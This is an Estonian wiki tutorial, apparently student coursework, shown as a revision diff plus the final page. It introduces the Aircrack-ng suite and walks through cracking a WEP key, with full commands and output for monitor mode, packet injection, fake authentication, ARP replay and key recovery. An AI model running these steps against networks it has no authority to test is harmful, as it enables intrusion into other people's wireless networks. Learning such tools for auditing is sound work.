Aircrack: Difference between revisions
(23 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
=Sissejuhatus= | =Sissejuhatus= | ||
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. | Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust. | ||
==Üldkirjeldus== | |||
Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisuse taset ja juhtida tähelepanu selles haavatavatele kohtadele. <code>aircrack-ng</code>, ühe osana suurest tööriistakomplektist, on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>: | |||
* airodump-ng - programm pakettide püüdmiseks | |||
* aireplay-ng - programm pakettide „süstimiseks“ | |||
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija | |||
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks | |||
==Süntaks== | |||
aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>: | |||
<pre>aircrack-ng [võti] <püütud fail(id)></pre> | |||
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!] | |||
=Eeldused= | =Eeldused= | ||
Line 11: | Line 26: | ||
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit]) | * aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit]) | ||
WiFi adapteri vaatamine: | WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>: | ||
<pre>lspci -nn | grep Network</pre> | <pre>lspci -nn | grep Network</pre> | ||
või rohkema informatsiooni saamiseks: | või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>: | ||
<pre>lshw -class network</pre> | <pre>lshw -class network</pre> | ||
Line 38: | Line 53: | ||
resources: irq:32 memory:f7d00000-f7d01fff</pre> | resources: irq:32 memory:f7d00000-f7d01fff</pre> | ||
<<!-- Warning style viksitud ArchWikist -->div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 | <<!-- Warning style viksitud ArchWikist -->div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div> | ||
=Installeerimine= | =Installeerimine= | ||
Line 60: | Line 60: | ||
<pre>sudo apt-get update</pre> | <pre>sudo apt-get update</pre> | ||
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt: | Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>: | ||
<pre>sudo apt-get install aircrack-ng</pre> | <pre>sudo apt-get install aircrack-ng</pre> | ||
Line 73: | Line 73: | ||
==Eesmärk== | ==Eesmärk== | ||
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks. | Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>. | ||
==Lühikesed tegevussammud== | ==Lühikesed tegevussammud== | ||
Lühidalt sammudest, mida tegema asume:<br> | Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>:<br> | ||
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)<br> | 1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)<br> | ||
2. Testime „süstimise“ suutlikkust pääsupunktile <br> | 2. Testime „süstimise“ suutlikkust pääsupunktile <br> | ||
Line 86: | Line 86: | ||
==Näide WEP võtme lahti murdmise protsessist== | ==Näide WEP võtme lahti murdmise protsessist== | ||
'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<br> | '''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref><br> | ||
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“. | Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“. | ||
Line 145: | Line 145: | ||
<br> | <br> | ||
<br> | <br> | ||
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<br> | <br> | ||
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref><br> | |||
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“. | Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“. | ||
Line 171: | Line 172: | ||
<br> | <br> | ||
<br> | <br> | ||
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<br> | <br> | ||
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref><br> | |||
Ava uus konsooliaken ja sisesta: | Ava uus konsooliaken ja sisesta: | ||
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre> | <pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre> | ||
Line 192: | Line 194: | ||
<br> | <br> | ||
<br> | <br> | ||
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<br> | '''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref><br> | ||
Ava uus konsooliaken ja sisesta: | Ava uus konsooliaken ja sisesta: | ||
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre> | <pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre> | ||
Line 221: | Line 223: | ||
<br> | <br> | ||
<br> | <br> | ||
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<br> | '''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref><br> | ||
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. | Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. | ||
Line 233: | Line 235: | ||
<br> | <br> | ||
<br> | <br> | ||
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<br> | '''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref><br> | ||
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. | Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. | ||
Line 257: | Line 259: | ||
=Kokkuvõte= | =Kokkuvõte= | ||
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku. | |||
=Kasutatud kirjandus= | =Kasutatud kirjandus= |
Latest revision as of 11:36, 26 May 2015
Sissejuhatus
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.
Üldkirjeldus
Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisuse taset ja juhtida tähelepanu selles haavatavatele kohtadele. aircrack-ng
, ühe osana suurest tööriistakomplektist, on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm[1]. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu[2]:
- airodump-ng - programm pakettide püüdmiseks
- aireplay-ng - programm pakettide „süstimiseks“
- aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
- airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks
Süntaks
aircrack-ng süntaks näeb välja järgmine[3]:
aircrack-ng [võti] <püütud fail(id)>
Nimekirja võtmetele leiab SIIT!
Eeldused
- Elementaarne käsurea kasutamisoskus
- Teadmised WiFi, WEP, WPA/WPA2 kohta
- Võrgus vähemalt 1 aktiivne klient
- Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
- Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
- aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: siit ja siit)
WiFi adapteri vaatamine[4]:
lspci -nn | grep Network
või rohkema informatsiooni saamiseks[5]:
lshw -class network
Tulemuseks saame midagi sarnast:
02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)
või
*-network description: Wireless interface product: Centrino Advanced-N 6205 [Taylor Peak] vendor: Intel Corporation physical id: 0 bus info: pci@0000:02:00.0 logical name: wlan0 version: 34 serial: 6c:88:14:1d:29:c4 width: 64 bits clock: 33MHz capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn resources: irq:32 memory:f7d00000-f7d01fff
Installeerimine
Uuendame repositooriumi:
sudo apt-get update
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt[6]:
sudo apt-get install aircrack-ng
WEP võtme murdmine
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja[7]:
- Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
- BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
- ESSID (võrgu nimi): teddy
- Pääsupunkti kanal: 9
- Raadiovõrgu liides (ingl. k Wireless interface): ath0
Eesmärk
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks[8].
Lühikesed tegevussammud
Lühidalt sammudest, mida tegema asume[9]:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)
2. Testime „süstimise“ suutlikkust pääsupunktile
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid
Näide WEP võtme lahti murdmise protsessist
Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi[10]
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.
Peata ath0 liides:
airmon-ng stop ath0
Tulemus:
Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Kontrolli, kas kõik athX liidesed on ikka suletud:
iwconfig
Tulemus:
lo no wireless extensions. eth0 no wireless extensions. wifi0 no wireless extensions.
Märge: Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval airmon-ng stop athX käsuga sulgeda.
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
airmon-ng start wifi0 9
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.
Tulemus:
Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.
Veendumaks, et liides on korrektselt üles seatud:
iwconfig
Tulemus:
lo no wireless extensions. wifi0 no wireless extensions. eth0 no wireless extensions. ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
Samm 2: Testime „süstimise“ suutlikkust pääsupunktile[11]
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.
Sisesta käsureale:
aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0
Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides
Tulemus:
09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 09:23:35 Trying broadcast probe requests... 09:23:35 Injection is working! 09:23:37 Found 1 AP 09:23:37 Trying directed probe requests... 09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy' 09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73 09:23:39 30/30: 100%
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
Samm 3: Avada airodump-ng pakettide püüdmiseks[12]
Ava uus konsooliaken ja sisesta:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0
Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga[13]
Ava uus konsooliaken ja sisesta:
aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress
Õnnestumise korral on tulemus:
18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request 18:28:02 Authentication successful 18:28:02 Sending Association Request 18:28:02 Association successful :-) 18:28:02 Got a deauthentication packet! 18:28:05 Sending Authentication Request 18:28:05 Authentication successful 18:28:05 Sending Association Request 18:28:10 Sending Authentication Request 18:28:10 Authentication successful 18:28:10 Sending Association Request
Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis[14]
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.
Ava uus konsooliaken ja sisesta:
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
Tulemus:
Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
Samm 6: Ava aircrack-ng salasõna lahti murdmiseks[15]
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.
Ava uus konsooliaken:
aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”
Tulemus:
[00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
Kokkuvõte
aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.
Kasutatud kirjandus
- ↑ Description
- ↑ Aircrack-ng (WEP, WPA-PSK Crack)
- ↑ Usage
- ↑ PCI
- ↑ HowTo: Linux Show List Of Network Cards
- ↑ Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]
- ↑ Equipment used
- ↑ Solution Overview
- ↑ Solution Overview - the basic steps
- ↑ Step 1 - Start the wireless interface in monitor mode on AP channel
- ↑ Step 2 - Test Wireless Device Packet Injection
- ↑ Step 3 - Start airodump-ng to capture the IVs
- ↑ Step 4 - Use aireplay-ng to do a fake authentication with the access point
- ↑ Step 5 - Start aireplay-ng in ARP request replay mode
- ↑ Step 6 - Run aircrack-ng to obtain the WEP key
Autor
Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015
Versioonide ajalugu
Kuupäev | Versioon |
---|---|
25.05.2015 | 1.0 |